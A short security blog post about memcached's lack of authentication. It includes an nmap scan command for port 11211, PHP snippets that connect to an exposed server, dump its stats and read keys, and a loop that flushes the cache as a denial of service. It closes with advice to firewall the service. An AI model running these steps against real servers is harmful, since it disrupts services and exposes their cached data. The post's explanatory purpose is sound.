infiltrate

(A braindump/discussion on memcache security)

A quick brief on memcache ripped from wikipedia:

memcached is a general-purpose distributed memory caching system that was originally developed by Danga Interactive for LiveJournal, but is now used by many other sites. It is often used to speed up dynamic database-driven websites by caching data and objects in memory to reduce the number of times the database must be read.

To illustrate the popularity of memcache

The system is used by several very large, well-known sites including YouTube[2], LiveJournal, Slashdot, Wikipedia, SourceForge, ShowClix, GameFAQs, Facebook, Digg, Twitter[3], Fotolog, BoardGameGeek, NYTimes.com, deviantART, Jamendo, Kayak and Netlog.

Memcache is extremely specific in it’s function: it caches data in memory. In simplicity, it becomes trivial to setup and use. In security, memcache is another process of a system and increases complexity.

Comparison to MySQL

While MySQL and Memcache are like apples to oranges, they both bear fruit. Memcache is frequently used in parallel with MySQL, an open source database. The major difference is that MySQL (and others) has authentication and authorization, for instance it’s possible to create a MySQL user with the sole permission to ‘insert’ data. MySQL and Memcache are similar because MySQL data frequently lives in memcache. and becomes a part of it’s security model.

Exposure

Because Memcache lacks any form of authentication, any exposure of memcached to an attacker provides fully privileged access to the data. Memcache also starts with a default TCP port of 11211, giving it a known location for internet scans.

nmap 192.168.0.0/16 -p 11211 -P0

I’ll make another bold assumption that most memcache installations won’t be run on the same machine as their web server… meaning these memcache config lines will be at risk of misconfiguration:

# Specify which IP address to listen on. The default is to listen on all IP addresses
# This parameter is one of the only security measures that memcached has, so make sure
# it’s listening on a firewalled interface.
#-l 127.0.0.

Potential Attacks on Memcache

Assuming we can find an exposed memcache server on a network or the internet, what kind of damage can be done?

Recon

In PHP, a simple memcache script will connect to the server:

$memcache->connect(‘target’, 11211) or die (“Could not connect”);

From here, we can dump stats on the server:

echo $stats = $memcache->getExtendedStats();

Which provides us with:

[target:11211] => Array
(
[pid] => 17924
[uptime] => 1654
[time] => 1213583634
[version] => 1.2.1
[pointer_size] => 32
[rusage_user] => 0.000000
[rusage_system] => 0.068004
[curr_items] => 1
[total_items] => 1
[bytes] => 111
[curr_connections] => 2
[total_connections] => 8
[connection_structures] => 3
[cmd_get] => 1
[cmd_set] => 1
[get_hits] => 1
[get_misses] => 0
[bytes_read] => 167
[bytes_written] => 1487
[limit_maxbytes] => 67108864
)

)

While there isn’t much of value here to gain any sort of foothold on the server, there is at least a version number and system time. The former can be used to search for known vulnerabilities, and the system time may be needed for some obscure attack on the systems crypto if it has any. The rest of the data may be used for other attacks : it’s all at least recon.

Denial of Service

This one is pretty easy.

while(1){
$memcache_obj->flush();
sleep(5);
}

This should clear out all stored keys every 5 seconds.

Tampering / Data Breach

There doesn’t seem to be any supported means of enumerating through existing memcache keys, but there’s always brute force. Because memcache is totally open once it’s found, you can either read or modify any available key on the system. The hard part is knowing what keys are there:

$var = $memcache_obj->get(‘some_key’);

In any attack there may be other information available as to what the system is running and may be using memcache for. In proprietary or home grown systems key locations may be near impossible to figure out, but open source systems are different.

Conclusion

Securing memcache from the internet with a firewall and solves mitigates most threats. One can assume plenty of of memcache admins will fuck this up.

Short point of this article: if you can hit a memcache port (TCP 11211), nothing will prevent reading and writing to the cache, getting info about the server, or DoS to the application.